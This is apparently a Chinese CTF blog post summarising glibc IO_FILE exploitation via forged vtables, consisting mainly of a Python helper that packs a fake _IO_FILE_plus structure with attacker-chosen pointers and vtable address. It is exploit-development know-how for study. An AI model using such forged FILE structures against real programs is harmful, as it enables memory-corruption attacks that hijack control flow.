0%

io_file总结

Posted on In , , Views: Valine:
Symbols count in article: 3.2k Reading time ≈ 3 mins.

io_file总结

  1. vtable,伪造vtable进行攻击,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161

_IO_USE_OLD_IO_FILE = False
_BITS = 64
 
 
def _u64(data):
    return struct.unpack("<Q", data)[0]
 
 
def _u32(data):
    return struct.unpack("<I", data)[0]
 
 
def _u16(data):
    return struct.unpack("<H", data)[0]
 
 
def _u8(data):
    return ord(data)
 
 
def _usz(data):
    if _BITS == 32:
        return _u32(data)
    elif _BITS == 64:
        return _u64(data)
    else:
        print("[-] Invalid _BITS")
        exit()
 
 
def _ua(data):
    if _BITS == 32:
        return _u32(data)
    elif _BITS == 64:
        return _u64(data)
    else:
        print("[-] Invalid _BITS")
        exit()
 
 
def _p64(data):
    return struct.pack("<Q", data)
 
 
def _p32(data):
    return struct.pack("<I", data)
 
 
def _p16(data):
    return struct.pack("<H", data)
 
 
def _p8(data):
    return chr(data)
 
 
def _psz(data):
    if _BITS == 32:
        return _p32(data)
    elif _BITS == 64:
        return _p64(data)
    else:
        print("[-] Invalid _BITS")
        exit()
 
 
def _pa(data):
    if _BITS == 32:
        return struct.pack("<I", data)
    elif _BITS == 64:
        return struct.pack("<Q", data)
    else:
        print("[-] Invalid _BITS")
        exit()
 
 
class _IO_FILE_plus:
    def __init__(self):
        self._flags = 0x00000000fbad2887  # High-order word is _IO_MAGIC; rest is flags.
        self._IO_read_ptr = 0x602500  # Current read pointer
        self._IO_read_end = 0x602500  # End of get area
        self._IO_read_base = 0x602500  # Start of putback+get area
        self._IO_write_base = 0x602600  # Start of put area
        self._IO_write_ptr = 0x602600  # Current put pointer
        self._IO_write_end = 0x602600  # End of put area
        self._IO_buf_base = 0x602600  # Start of reserve area
        self._IO_buf_end = 0x602601  # End of reserve area
 
        # The following fields are used to support backing up and undo.
        self._IO_save_base = 0  # Pointer to start of non-current get area
        self._IO_backup_base = 0  # Pointer to first valid character of backup area
        self._IO_save_end = 0  # Pointer to end of non-current get area
 
        self._markers = 0
        self._chain = 0
 
        self._fileno = 0
        self._flags2 = 0
        self._old_offset = 0  # This used to be _offset but it's too small
 
        # 1+column number of pbase(); 0 is unknown
        self._cur_column = 0
        self._vtable_offset = 0
        self._shortbuf = 0
 
        self._lock = 0x602700
 
        if not _IO_USE_OLD_IO_FILE:
            self._offset = 0
            self._codecvt = 0
            self._wide_data = 0
            self._freeres_list = 0
            self._freeres_buf = 0
            self.__pad5 = 0
            self._mode = 0
            self._unused2 = [0 for i in range(15 * 4 - 5 * _BITS / 8)]
        self.vtable = vtable_address
 
    def tostr(self):
        buf = _p64(self._flags & 0xffffffff) + \
              _pa(self._IO_read_ptr) + \
              _pa(self._IO_read_end) + \
              _pa(self._IO_read_base) + \
              _pa(self._IO_write_base) + \
              _pa(self._IO_write_ptr) + \
              _pa(self._IO_write_end) + \
              _pa(self._IO_buf_base) + \
              _pa(self._IO_buf_end) + \
              _pa(self._IO_save_base) + \
              _pa(self._IO_backup_base) + \
              _pa(self._IO_save_end) + \
              _pa(self._markers) + \
              _pa(self._chain) + \
              _p32(self._fileno) + \
              _p32(self._flags2) + \
              _p64(self._old_offset) + \
              _p16(self._cur_column) + \
              _p8(self._vtable_offset) + \
              _p8(self._shortbuf)
        if _BITS == 64:
            buf += _p32(0)
        buf += _pa(self._lock)
        if not _IO_USE_OLD_IO_FILE:
            buf += \
                _p64(self._offset) + \
                _pa(self._codecvt) + \
                _pa(self._wide_data) + \
                _pa(self._freeres_list) + \
                _pa(self._freeres_buf) + \
                _psz(self.__pad5) + \
                _p32(self._mode) + \
                ''.join(map(lambda x: _p8(x), self._unused2)) + \
                _pa(self.vtable)
        return buf
 
    def __str__(self):
        return self.tostr()
    

s = _IO_FILE_plus().tostr()

本文作者:NoOne
本文地址https://noonegroup.xyz/posts/fb6ee9e/
版权声明:转载请注明出处!